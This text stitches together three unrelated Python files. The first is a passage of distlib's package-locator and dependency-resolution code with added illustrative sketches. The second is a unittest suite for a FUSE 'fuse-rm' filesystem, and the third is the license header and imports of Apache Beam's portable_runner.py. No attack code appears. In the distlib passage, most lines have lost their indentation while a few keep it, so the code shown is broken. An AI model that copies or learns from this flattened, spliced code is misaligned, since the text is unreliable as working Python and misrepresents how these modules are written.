Update a result dictionary (the final result from _get_project) with a
dictionary for a specific version, which typically holds information
gleaned from a filename or URL for an archive for the distribution.
"""
name = info.pop('name')
version = info.pop('version')
if version in result:
dist = result[version]
md = dist.metadata
else:
dist = make_dist(name, version, scheme=self.scheme)
md = dist.metadata
dist.digest = digest = self._get_digest(info)
url = info['url']
result['digests'][url] = digest
if md.source_url != info['url']:
md.source_url = self.prefer_url(md.source_url, url)
result['urls'].setdefault(version, set()).add(url)
dist.locator = self
result[version] = dist
def locate(self, requirement, prereleases=False):
"""
Find the most recent distribution which matches the given
requirement.
:param requirement: A requirement of the form 'foo (1.0)' or perhaps
'foo (>= 1.0, < 2.0, != 1.3)'
:param prereleases: If ``True``, allow pre-release versions
to be located. Otherwise, pre-release versions
are not returned.
:return: A :class:`Distribution` instance, or ``None`` if no such
distribution could be located.
"""
result = None
r = parse_requirement(requirement)
if r is None: # pragma: no cover
raise DistlibException('Not a valid requirement: %r' % requirement)
scheme = get_scheme(self.scheme)
self.matcher = matcher = scheme.matcher(r.requirement)
logger.debug('matcher: %s (%s)', matcher, type(matcher).__name__)
versions = self.get_project(r.name)
if len(versions) > 2: # urls and digests keys are present
# sometimes, versions are invalid
slist = []
vcls = matcher.version_class
for k in versions:
if k in ('urls', 'digests'):
continue
try:
if not matcher.match(k):
pass # logger.debug('%s did not match %r', matcher, k)
else:
if prereleases or not vcls(k).is_prerelease:
slist.append(k)
# else:
# logger.debug('skipping pre-release '
# 'version %s of %s', k, matcher.name)
except Exception: # pragma: no cover
logger.warning('error matching %s with %r', matcher, k)
pass # slist.append(k)
if len(slist) > 1:
slist = sorted(slist, key=scheme.key)
if slist:
logger.debug('sorted list: %s', slist)
version = slist[-1]
result = versions[version]
if result:
if r.extras:
result.extras = r.extras
result.download_urls = versions.get('urls', {}).get(version, set())
d = {}
sd = versions.get('digests', {})
for url in result.download_urls:
if url in sd: # pragma: no cover
d[url] = sd[url]
result.digests = d
self.matcher = None
return result
class PyPIRPCLocator(Locator):
"""
This locator uses XML-RPC to locate distributions. It therefore
cannot be used with simple mirrors (that only mirror file content).
"""
def __init__(self, url, **kwargs):
"""
Initialise an instance.
:param url: The URL to use for XML-RPC.
:param kwargs: Passed to the superclass constructor.
"""
super(PyPIRPCLocator, self).__init__(**kwargs)
self.base_url = url
self.client = ServerProxy(url, timeout=3.0)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
return set(self.client.list_packages())
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
versions = self.client.package_releases(name, True)
for v in versions:
urls = self.client.release_urls(name, v)
data = self.client.release_data(name, v)
metadata = Metadata(scheme=self.scheme)
metadata.name = data['name']
metadata.version = data['version']
metadata.license = data.get('license')
metadata.keywords = data.get('keywords', [])
metadata.summary = data.get('summary')
dist = Distribution(metadata)
if urls:
info = urls[0]
metadata.source_url = info['url']
dist.digest = self._get_digest(info)
dist.locator = self
result[v] = dist
for info in urls:
url = info['url']
digest = self._get_digest(info)
result['urls'].setdefault(v, set()).add(url)
result['digests'][url] = digest
return result
class PyPIJSONLocator(Locator):
"""
This locator uses PyPI's JSON interface. It's very limited in functionality
and probably not worth using.
"""
def __init__(self, url, **kwargs):
super(PyPIJSONLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
url = urljoin(self.base_url, '%s/json' % quote(name))
try:
resp = self.opener.open(url)
data = resp.read().decode() # for now
d = json.loads(data)
md = Metadata(scheme=self.scheme)
data = d['info']
md.name = data['name']
md.version = data['version']
md.license = data.get('license')
md.keywords = data.get('keywords', [])
md.summary = data.get('summary')
dist = Distribution(md)
dist.locator = self
urls = d['urls']
result[md.version] = dist
for info in d['urls']:
url = info['url']
dist.download_urls.add(url)
dist.digests[url] = self._get_digest(info)
result['urls'].setdefault(md.version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# Now get other releases
for version, infos in d['releases'].items():
if version == md.version:
continue # already done
omd = Metadata(scheme=self.scheme)
omd.name = md.name
omd.version = version
odist = Distribution(omd)
odist.locator = self
result[version] = odist
for info in infos:
url = info['url']
odist.download_urls.add(url)
odist.digests[url] = self._get_digest(info)
result['urls'].setdefault(version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# for info in urls:
# md.source_url = info['url']
# dist.digest = self._get_digest(info)
# dist.locator = self
# for info in urls:
# url = info['url']
# result['urls'].setdefault(md.version, set()).add(url)
# result['digests'][url] = self._get_digest(info)
except Exception as e:
self.errors.put(text_type(e))
logger.exception('JSON fetch failed: %s', e)
return result
class Page(object):
"""
This class represents a scraped HTML page.
"""
# The following slightly hairy-looking regex just looks for the contents of
# an anchor link, which has an attribute "href" either immediately preceded
# or immediately followed by a "rel" attribute. The attribute values can be
# declared with double quotes, single quotes or no quotes - which leads to
# the length of the expression.
_href = re.compile("""
(rel\\s*=\\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\\s\n]*))\\s+)?
href\\s*=\\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\\s\n]*))
(\\s+rel\\s*=\\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\\s\n]*)))?
""", re.I | re.S | re.X)
_base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S)
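# Example (editor's sketch): the _href pattern matches anchors such as
# <a href="foo-1.0.tar.gz" rel="download"> or <a rel='homepage' href=index.html>, capturing
# the href value in one of the urlN groups and the rel value (if any) in one of the relN
# groups, regardless of quoting style and of whether rel precedes or follows href.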
def __init__(self, data, url):
"""
Initialise an instance with the Unicode page contents and the URL they
came from.
"""
self.data = data
self.base_url = self.url = url
m = self._base.search(self.data)
if m:
self.base_url = m.group(1)
_clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I)
@cached_property
def links(self):
"""
Return the URLs of all the links on a page together with information
about their "rel" attribute, for determining which ones to treat as
downloads and which ones to queue for further scraping.
"""
def clean(url):
"Tidy up an URL."
scheme, netloc, path, params, query, frag = urlparse(url)
return urlunparse((scheme, netloc, quote(path),
params, query, frag))
result = set()
for match in self._href.finditer(self.data):
d = match.groupdict('')
rel = (d['rel1'] or d['rel2'] or d['rel3'] or
d['rel4'] or d['rel5'] or d['rel6'])
url = d['url1'] or d['url2'] or d['url3']
url = urljoin(self.base_url, url)
url = unescape(url)
url = self._clean_re.sub(lambda m: '%%%2x' % ord(m.group(0)), url)
result.add((url, rel))
# We sort the result, hoping to bring the most recent versions
# to the front
result = sorted(result, key=lambda t: t[0], reverse=True)
return result
class SimpleScrapingLocator(Locator):
"""
A locator which scrapes HTML pages to locate downloads for a distribution.
This runs multiple threads to do the I/O; performance is at least as good
as pip's PackageFinder, which works in an analogous fashion.
"""
# These are used to deal with various Content-Encoding schemes.
decoders = {
'deflate': zlib.decompress,
'gzip': lambda b: gzip.GzipFile(fileobj=BytesIO(b)).read(),
'none': lambda b: b,
}
def __init__(self, url, timeout=None, num_workers=10, **kwargs):
"""
Initialise an instance.
:param url: The root URL to use for scraping.
:param timeout: The timeout, in seconds, to be applied to requests.
This defaults to ``None`` (no timeout specified).
:param num_workers: The number of worker threads to use for I/O.
This defaults to 10.
:param kwargs: Passed to the superclass.
"""
super(SimpleScrapingLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
self.timeout = timeout
self._page_cache = {}
self._seen = set()
self._to_fetch = queue.Queue()
self._bad_hosts = set()
self.skip_externals = False
self.num_workers = num_workers
self._lock = threading.RLock()
# See issue #45: we need to be resilient when the locator is used
# in a thread, e.g. with concurrent.futures. We can't use self._lock
# as it is for coordinating our internal threads - the ones created
# in _prepare_threads.
self._gplock = threading.RLock()
self.platform_check = False # See issue #112
def _prepare_threads(self):
"""
Threads are created only when get_project is called, and terminate
before it returns. They are there primarily to parallelise I/O (i.e.
fetching web pages).
"""
self._threads = []
for i in range(self.num_workers):
t = threading.Thread(target=self._fetch)
t.daemon = True
t.start()
self._threads.append(t)
def _wait_threads(self):
"""
Tell all the threads to terminate (by sending a sentinel value) and
wait for them to do so.
"""
# Note that you need two loops, since you can't say which
# thread will get each sentinel
for t in self._threads:
self._to_fetch.put(None) # sentinel
for t in self._threads:
t.join()
self._threads = []
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
with self._gplock:
self.result = result
self.project_name = name
url = urljoin(self.base_url, '%s/' % quote(name))
self._seen.clear()
self._page_cache.clear()
self._prepare_threads()
try:
logger.debug('Queueing %s', url)
self._to_fetch.put(url)
self._to_fetch.join()
finally:
self._wait_threads()
del self.result
return result
platform_dependent = re.compile(r'\b(linux_(i\d86|x86_64|arm\w+)|'
r'win(32|_amd64)|macosx_?\d+)\b', re.I)
def _is_platform_dependent(self, url):
"""
Does an URL refer to a platform-specific download?
"""
return self.platform_dependent.search(url)
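# Example (editor's sketch): 'foo-1.0-cp39-cp39-win_amd64.whl' and
# 'bar-2.0-cp39-cp39-linux_x86_64.whl' both match the pattern above and are treated as
# platform-specific when platform_check is enabled, while a pure-Python
# 'foo-1.0-py3-none-any.whl' does not match.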
def _process_download(self, url):
"""
See if an URL is a suitable download for a project.
If it is, register information in the result dictionary (for
_get_project) about the specific version it's for.
Note that the return value isn't actually used other than as a boolean
value.
"""
if self.platform_check and self._is_platform_dependent(url):
info = None
else:
info = self.convert_url_to_download_info(url, self.project_name)
logger.debug('process_download: %s -> %s', url, info)
if info:
with self._lock: # needed because self.result is shared
self._update_version_data(self.result, info)
return info
def _should_queue(self, link, referrer, rel):
"""
Determine whether a link URL from a referring page and with a
particular "rel" attribute should be queued for scraping.
"""
scheme, netloc, path, _, _, _ = urlparse(link)
if path.endswith(self.source_extensions + self.binary_extensions +
self.excluded_extensions):
result = False
elif self.skip_externals and not link.startswith(self.base_url):
result = False
elif not referrer.startswith(self.base_url):
result = False
elif rel not in ('homepage', 'download'):
result = False
elif scheme not in ('http', 'https', 'ftp'):
result = False
elif self._is_platform_dependent(link):
result = False
else:
host = netloc.split(':', 1)[0]
if host.lower() == 'localhost':
result = False
else:
result = True
logger.debug('should_queue: %s (%s) from %s -> %s', link, rel,
referrer, result)
return result
def _fetch(self):
"""
Get a URL to fetch from the work queue, get the HTML page, examine its
links for download candidates and candidates for further scraping.
This is a handy method to run in a thread.
"""
while True:
url = self._to_fetch.get()
try:
if url:
page = self.get_page(url)
if page is None: # e.g. after an error
continue
for link, rel in page.links:
if link not in self._seen:
try:
self._seen.add(link)
if (not self._process_download(link) and
self._should_queue(link, url, rel)):
logger.debug('Queueing %s from %s', link, url)
self._to_fetch.put(link)
except MetadataInvalidError: # e.g. invalid versions
pass
except Exception as e: # pragma: no cover
self.errors.put(text_type(e))
finally:
# always do this, to avoid hangs :-)
self._to_fetch.task_done()
if not url:
#logger.debug('Sentinel seen, quitting.')
break
def get_page(self, url):
"""
        Get the HTML for a URL, possibly from an in-memory cache.
XXX TODO Note: this cache is never actually cleared. It's assumed that
the data won't get stale over the lifetime of a locator instance (not
necessarily true for the default_locator).
"""
# http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api
scheme, netloc, path, _, _, _ = urlparse(url)
if scheme == 'file' and os.path.isdir(url2pathname(path)):
url = urljoin(ensure_slash(url), 'index.html')
if url in self._page_cache:
result = self._page_cache[url]
logger.debug('Returning %s from cache: %s', url, result)
else:
host = netloc.split(':', 1)[0]
result = None
if host in self._bad_hosts:
logger.debug('Skipping %s due to bad host %s', url, host)
else:
req = Request(url, headers={'Accept-encoding': 'identity'})
try:
logger.debug('Fetching %s', url)
resp = self.opener.open(req, timeout=self.timeout)
logger.debug('Fetched %s', url)
                    headers = resp.info()
content_type = headers.get('Content-Type', '')
if HTML_CONTENT_TYPE.match(content_type):
final_url = resp.geturl()
data = resp.read()
encoding = headers.get('Content-Encoding')
if encoding:
decoder = self.decoders[encoding] # fail if not found
data = decoder(data)
encoding = 'utf-8'
m = CHARSET.search(content_type)
if m:
encoding = m.group(1)
try:
data = data.decode(encoding)
except UnicodeError: # pragma: no cover
data = data.decode('latin-1') # fallback
result = Page(data, final_url)
self._page_cache[final_url] = result
except HTTPError as e:
if e.code != 404:
logger.exception('Fetch failed: %s: %s', url, e)
except URLError as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
with self._lock:
self._bad_hosts.add(host)
except Exception as e: # pragma: no cover
logger.exception('Fetch failed: %s: %s', url, e)
finally:
self._page_cache[url] = result # even if None (failure)
return result
_distname_re = re.compile('<a href=[^>]*>([^<]+)<')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
page = self.get_page(self.base_url)
if not page:
raise DistlibException('Unable to get %s' % self.base_url)
for match in self._distname_re.finditer(page.data):
result.add(match.group(1))
return result
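# Illustrative sketch (not part of distlib): driving a SimpleScrapingLocator
# directly. The index URL and project name are assumptions chosen only for the
# example; get_project() returns the mapping built by _get_project() above,
# i.e. 'urls', 'digests' plus one entry per located version.
def _example_scraping_locator():  # pragma: no cover
    locator = SimpleScrapingLocator('https://pypi.org/simple/', timeout=3.0)
    data = locator.get_project('pip')
    # Everything that is not the 'urls'/'digests' bookkeeping is a version key.
    return sorted(v for v in data if v not in ('urls', 'digests'))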
class DirectoryLocator(Locator):
"""
This class locates distributions in a directory tree.
"""
def __init__(self, path, **kwargs):
"""
Initialise an instance.
:param path: The root of the directory tree to search.
:param kwargs: Passed to the superclass constructor,
except for:
* recursive - if True (the default), subdirectories are
recursed into. If False, only the top-level directory
                           is searched.
"""
self.recursive = kwargs.pop('recursive', True)
super(DirectoryLocator, self).__init__(**kwargs)
path = os.path.abspath(path)
if not os.path.isdir(path): # pragma: no cover
raise DistlibException('Not a directory: %r' % path)
self.base_dir = path
def should_include(self, filename, parent):
"""
Should a filename be considered as a candidate for a distribution
archive? As well as the filename, the directory which contains it
is provided, though not used by the current implementation.
"""
return filename.endswith(self.downloadable_extensions)
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, name)
if info:
self._update_version_data(result, info)
if not self.recursive:
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for root, dirs, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', '', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
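# Illustrative sketch (not part of distlib): pointing a DirectoryLocator at a
# local folder of archives. The path is an assumption used only for the example.
def _example_directory_locator():  # pragma: no cover
    locator = DirectoryLocator('/tmp/wheelhouse', recursive=False)
    # Names are derived from the archive filenames found in the directory.
    return locator.get_distribution_names()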
class JSONLocator(Locator):
"""
This locator uses special extended metadata (not available on PyPI) and is
the basis of performant dependency resolution in distlib. Other locators
require archive downloads before dependencies can be determined! As you
might imagine, that can be slow.
"""
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
data = get_project_data(name)
if data:
            for info in data.get('files', []):
if info['ptype'] != 'sdist' or info['pyversion'] != 'source':
continue
# We don't store summary in project metadata as it makes
# the data bigger for no benefit during dependency
# resolution
                dist = make_dist(data['name'], info['version'],
                                 summary=data.get('summary',
                                                  'Placeholder for summary'),
                                 scheme=self.scheme)
md = dist.metadata
md.source_url = info['url']
# TODO SHA256 digest
if 'digest' in info and info['digest']:
dist.digest = ('md5', info['digest'])
md.dependencies = info.get('requirements', {})
dist.exports = info.get('exports', {})
result[dist.version] = dist
result['urls'].setdefault(dist.version, set()).add(info['url'])
return result
class DistPathLocator(Locator):
"""
This locator finds installed distributions in a path. It can be useful for
adding to an :class:`AggregatingLocator`.
"""
def __init__(self, distpath, **kwargs):
"""
Initialise an instance.
:param distpath: A :class:`DistributionPath` instance to search.
"""
super(DistPathLocator, self).__init__(**kwargs)
assert isinstance(distpath, DistributionPath)
self.distpath = distpath
def _get_project(self, name):
dist = self.distpath.get_distribution(name)
if dist is None:
result = {'urls': {}, 'digests': {}}
else:
result = {
dist.version: dist,
'urls': {dist.version: set([dist.source_url])},
'digests': {dist.version: set([None])}
}
return result
class AggregatingLocator(Locator):
"""
This class allows you to chain and/or merge a list of locators.
"""
def __init__(self, *locators, **kwargs):
"""
Initialise an instance.
:param locators: The list of locators to search.
:param kwargs: Passed to the superclass constructor,
except for:
* merge - if False (the default), the first successful
search from any of the locators is returned. If True,
the results from all locators are merged (this can be
slow).
"""
self.merge = kwargs.pop('merge', False)
self.locators = locators
super(AggregatingLocator, self).__init__(**kwargs)
def clear_cache(self):
super(AggregatingLocator, self).clear_cache()
for locator in self.locators:
locator.clear_cache()
def _set_scheme(self, value):
self._scheme = value
for locator in self.locators:
locator.scheme = value
scheme = property(Locator.scheme.fget, _set_scheme)
def _get_project(self, name):
result = {}
for locator in self.locators:
d = locator.get_project(name)
if d:
if self.merge:
files = result.get('urls', {})
digests = result.get('digests', {})
# next line could overwrite result['urls'], result['digests']
result.update(d)
df = result.get('urls')
if files and df:
for k, v in files.items():
if k in df:
df[k] |= v
else:
df[k] = v
dd = result.get('digests')
if digests and dd:
dd.update(digests)
else:
# See issue #18. If any dists are found and we're looking
# for specific constraints, we only return something if
# a match is found. For example, if a DirectoryLocator
# returns just foo (1.0) while we're looking for
# foo (>= 2.0), we'll pretend there was nothing there so
# that subsequent locators can be queried. Otherwise we
# would just return foo (1.0) which would then lead to a
# failure to find foo (>= 2.0), because other locators
# weren't searched. Note that this only matters when
# merge=False.
if self.matcher is None:
found = True
else:
found = False
for k in d:
if self.matcher.match(k):
found = True
break
if found:
result = d
break
return result
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
result = set()
for locator in self.locators:
try:
result |= locator.get_distribution_names()
except NotImplementedError:
pass
return result
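# Illustrative sketch (not part of distlib): chaining locators. With the default
# merge=False the first locator that yields a usable result wins; merge=True
# combines the urls/digests of all of them. The path and URL are assumptions.
def _example_aggregating_locator():  # pragma: no cover
    locator = AggregatingLocator(
        DirectoryLocator('/tmp/wheelhouse'),
        SimpleScrapingLocator('https://pypi.org/simple/', timeout=3.0),
        scheme='legacy')
    return locator.get_project('pip')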
# We use a legacy scheme simply because most of the dists on PyPI use legacy
# versions which don't conform to PEP 426 / PEP 440.
default_locator = AggregatingLocator(
JSONLocator(),
SimpleScrapingLocator('https://pypi.org/simple/',
timeout=3.0),
scheme='legacy')
locate = default_locator.locate
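# Illustrative sketch (not part of distlib): `locate` accepts a requirement
# string such as 'foo (>= 2.0)' and returns a Distribution or None. The project
# name and version used below are only an example.
def _example_locate():  # pragma: no cover
    dist = locate('pip (>= 20.0)')
    if dist is not None:
        print(dist.name_and_version, dist.source_url)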
class DependencyFinder(object):
"""
Locate dependencies for distributions.
"""
def __init__(self, locator=None):
"""
Initialise an instance, using the specified locator
to locate distributions.
"""
self.locator = locator or default_locator
self.scheme = get_scheme(self.locator.scheme)
def add_distribution(self, dist):
"""
Add a distribution to the finder. This will update internal information
about who provides what.
:param dist: The distribution to add.
"""
logger.debug('adding distribution %s', dist)
name = dist.key
self.dists_by_name[name] = dist
self.dists[(name, dist.version)] = dist
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Add to provided: %s, %s, %s', name, version, dist)
self.provided.setdefault(name, set()).add((version, dist))
def remove_distribution(self, dist):
"""
Remove a distribution from the finder. This will update internal
information about who provides what.
:param dist: The distribution to remove.
"""
logger.debug('removing distribution %s', dist)
name = dist.key
del self.dists_by_name[name]
del self.dists[(name, dist.version)]
for p in dist.provides:
name, version = parse_name_and_version(p)
logger.debug('Remove from provided: %s, %s, %s', name, version, dist)
s = self.provided[name]
s.remove((version, dist))
if not s:
del self.provided[name]
def get_matcher(self, reqt):
"""
Get a version matcher for a requirement.
:param reqt: The requirement
:type reqt: str
:return: A version matcher (an instance of
:class:`distlib.version.Matcher`).
"""
try:
matcher = self.scheme.matcher(reqt)
except UnsupportedVersionError: # pragma: no cover
# XXX compat-mode if cannot read the version
name = reqt.split()[0]
matcher = self.scheme.matcher(name)
return matcher
def find_providers(self, reqt):
"""
Find the distributions which can fulfill a requirement.
:param reqt: The requirement.
:type reqt: str
        :return: A set of distributions which can fulfill the requirement.
"""
matcher = self.get_matcher(reqt)
name = matcher.key # case-insensitive
result = set()
provided = self.provided
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
result.add(provider)
break
return result
def try_to_replace(self, provider, other, problems):
"""
Attempt to replace one provider with another. This is typically used
when resolving dependencies from multiple sources, e.g. A requires
(B >= 1.0) while C requires (B >= 1.1).
For successful replacement, ``provider`` must meet all the requirements
which ``other`` fulfills.
:param provider: The provider we are trying to replace with.
:param other: The provider we're trying to replace.
:param problems: If False is returned, this will contain what
problems prevented replacement. This is currently
a tuple of the literal string 'cantreplace',
``provider``, ``other`` and the set of requirements
that ``provider`` couldn't fulfill.
:return: True if we can replace ``other`` with ``provider``, else
False.
"""
rlist = self.reqts[other]
unmatched = set()
for s in rlist:
matcher = self.get_matcher(s)
if not matcher.match(provider.version):
unmatched.add(s)
if unmatched:
# can't replace other with provider
problems.add(('cantreplace', provider, other,
frozenset(unmatched)))
result = False
else:
# can replace other with provider
self.remove_distribution(other)
del self.reqts[other]
for s in rlist:
self.reqts.setdefault(provider, set()).add(s)
self.add_distribution(provider)
result = True
return result
def find(self, requirement, meta_extras=None, prereleases=False):
"""
Find a distribution and all distributions it depends on.
:param requirement: The requirement specifying the distribution to
find, or a Distribution instance.
:param meta_extras: A list of meta extras such as :test:, :build: and
so on.
:param prereleases: If ``True``, allow pre-release versions to be
returned - otherwise, don't return prereleases
unless they're all that's available.
Return a set of :class:`Distribution` instances and a set of
problems.
The distributions returned should be such that they have the
:attr:`required` attribute set to ``True`` if they were
from the ``requirement`` passed to ``find()``, and they have the
:attr:`build_time_dependency` attribute set to ``True`` unless they
are post-installation dependencies of the ``requirement``.
The problems should be a tuple consisting of the string
``'unsatisfied'`` and the requirement which couldn't be satisfied
by any distribution known to the locator.
"""
self.provided = {}
self.dists = {}
self.dists_by_name = {}
self.reqts = {}
meta_extras = set(meta_extras or [])
if ':*:' in meta_extras:
meta_extras.remove(':*:')
# :meta: and :run: are implicitly included
meta_extras |= set([':test:', ':build:', ':dev:'])
if isinstance(requirement, Distribution):
dist = odist = requirement
logger.debug('passed %s as requirement', odist)
else:
dist = odist = self.locator.locate(requirement,
prereleases=prereleases)
if dist is None:
raise DistlibException('Unable to locate %r' % requirement)
logger.debug('located %s', odist)
dist.requested = True
problems = set()
todo = set([dist])
install_dists = set([odist])
while todo:
dist = todo.pop()
name = dist.key # case-insensitive
if name not in self.dists_by_name:
self.add_distribution(dist)
else:
#import pdb; pdb.set_trace()
other = self.dists_by_name[name]
if other != dist:
self.try_to_replace(dist, other, problems)
ireqts = dist.run_requires | dist.meta_requires
sreqts = dist.build_requires
ereqts = set()
if meta_extras and dist in install_dists:
for key in ('test', 'build', 'dev'):
e = ':%s:' % key
if e in meta_extras:
ereqts |= getattr(dist, '%s_requires' % key)
all_reqts = ireqts | sreqts | ereqts
for r in all_reqts:
providers = self.find_providers(r)
if not providers:
logger.debug('No providers found for %r', r)
provider = self.locator.locate(r, prereleases=prereleases)
# If no provider is found and we didn't consider
# prereleases, consider them now.
if provider is None and not prereleases:
provider = self.locator.locate(r, prereleases=True)
if provider is None:
logger.debug('Cannot satisfy %r', r)
problems.add(('unsatisfied', r))
else:
n, v = provider.key, provider.version
if (n, v) not in self.dists:
todo.add(provider)
providers.add(provider)
if r in ireqts and dist in install_dists:
install_dists.add(provider)
logger.debug('Adding %s to install_dists',
provider.name_and_version)
for p in providers:
name = p.key
if name not in self.dists_by_name:
self.reqts.setdefault(p, set()).add(r)
else:
other = self.dists_by_name[name]
if other != p:
# see if other can be replaced by p
self.try_to_replace(p, other, problems)
dists = set(self.dists.values())
for dist in dists:
dist.build_time_dependency = dist not in install_dists
if dist.build_time_dependency:
logger.debug('%s is a build-time dependency only.',
dist.name_and_version)
logger.debug('find done for %s', odist)
return dists, problems
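# Illustrative sketch (not part of distlib): resolving a requirement and its
# dependency closure with DependencyFinder. The requirement string is an
# assumption; find() returns (distributions, problems) as documented above.
def _example_dependency_finder():  # pragma: no cover
    finder = DependencyFinder(default_locator)
    dists, problems = finder.find('requests (>= 2.0)')
    for problem in problems:
        print('problem:', problem)
    return dists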
|
test.py
|
import unittest
import glob
import json
import os
import shutil
import time
from datetime import datetime
from threading import Thread
from subprocess import Popen, PIPE, check_output
from pathlib import Path
ROOT = Path(__file__).parent
SRC_DIR = ROOT / 'source'
TARGET_DIR = ROOT / 'target'
class Test(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._fuserm = Popen(['cargo', 'run', '--', SRC_DIR, TARGET_DIR],
stdout=PIPE)
cls._fuserm_output = []
while True:
line = cls._fuserm.stdout.readline()
if line.startswith(b'Waiting for Ctrl-C'):
break
            elif cls._fuserm.poll() is not None:
raise RuntimeError('fuse-rm failed to start')
else:
print(line)
cls._fuserm_thread = Thread(target=cls.capture_fuserm_output)
cls._fuserm_thread.start()
os.chdir(TARGET_DIR)
@classmethod
def capture_fuserm_output(cls):
while True:
if cls._fuserm.poll() is not None:
break
cls._fuserm_output.append(cls._fuserm.stdout.readline())
#print(cls._fuserm_output[-1])
@classmethod
def tearDownClass(cls):
cls._fuserm.terminate()
def test_file_structure_root(self):
root = set(check_output('stat -c "%s %n" *', shell=True).decode().split('\n'))
self.assertSetEqual(root, { '',
'0 dolor',
'0 trash',
'126501 ipsum.pdf',
'4091 lorem.epub' })
def test_file_structure_subdir(self):
dir = set(check_output(['stat -c "%s %n" dolor/*'], shell=True).decode().split('\n'))
self.assertSetEqual(dir, { '',
'30875 dolor/ipsum.epub',
'28859 dolor/lorem.pdf' })
def test_rename(self):
test_file = Path('ipsum.pdf')
test_file_sz = test_file.stat().st_size
new_file = test_file.rename(Path('dolor') / test_file.name)
self.assertEqual(test_file_sz, new_file.stat().st_size)
self.assertFalse(test_file.exists())
new_file.rename(test_file)
self.assertEqual(test_file_sz, test_file.stat().st_size)
def test_mkdir(self):
test_dir = Path('test_dir')
test_dir.mkdir()
self.assertTrue(test_dir.exists())
test_dir_2 = test_dir / 't1'
test_dir_2.mkdir()
self.assertRaisesRegex(OSError, 'not empty', test_dir.rmdir)
test_dir_2.rmdir()
test_dir.rmdir()
def test_add_epub(self):
test_file = Path('ipsum.epub')
self.assertFalse(test_file.exists())
shutil.copyfile(Path('..') / test_file, test_file)
self.test_file_structure_subdir()
self.assertTrue(test_file.exists())
test_file.unlink()
self.assertFalse(test_file.exists())
def test_add_pdf_subdir(self):
test_file = Path('dolor/ipsum.pdf')
src_file = Path('..') / test_file.name
self.assertFalse(test_file.exists())
shutil.copyfile(src_file, test_file)
self.test_file_structure_root()
self.assertEqual(test_file.stat().st_size, src_file.stat().st_size)
test_file.unlink()
self.assertFalse(test_file.exists())
def test_add_unsupported(self):
test_file = Path('../lorem.txt')
self.assertRaisesRegex(OSError, 'not implemented',
lambda: shutil.copyfile(test_file, test_file.name))
def test_rm_recursive(self):
test_dir = Path('test-dir/deeper/')
test_dir.mkdir(parents=True, exist_ok=True)
self.assertTrue(test_dir.exists())
shutil.copyfile('../lorem.epub', test_dir / 'a')
shutil.copyfile('../lorem.pdf', test_dir / 'b')
shutil.rmtree(test_dir.parent)
self.assertFalse(test_dir.exists())
def test_dir_with_dot(self):
# make KOReader's side cars go away
test_dir = Path('test-dir.sdr')
self.assertRaisesRegex(OSError, 'not implemented',
test_dir.mkdir)
# TODO: file moved to trash -> file exists error
def test_last_modified(self):
curtime = datetime.now()
test_file = Path('ipsum.epub')
self.assertFalse(test_file.exists())
shutil.copyfile(Path('..') / test_file, test_file)
newest = max(glob.iglob(str(SRC_DIR) + '/*.metadata'),
key=os.path.getctime)
print(newest)
with open(newest) as f:
metadata = json.load(f)
self.assertTrue(isinstance(metadata['lastModified'], str))
modtime = datetime.fromtimestamp(int(metadata['lastModified']) // 1000)
self.assertTrue((modtime - curtime).total_seconds() < 1)
test_file.unlink()
self.assertFalse(test_file.exists())
def test_trash(self):
dir = set(check_output(['stat -c "%s %n" trash/*'], shell=True).decode().split('\n'))
self.assertSetEqual(dir, { '',
'28859 trash/lorem-trashed.pdf' })
|
portable_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
# mypy: check-untyped-defs
import atexit
import functools
import itertools
import logging
import threading
import time
from typing import TYPE_CHECKING
from typing import Any
from typing import Dict
from typing import Iterator
from typing import Optional
from typing import Tuple
import grpc
from apache_beam.metrics import metric
from apache_beam.metrics.execution import MetricResult
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
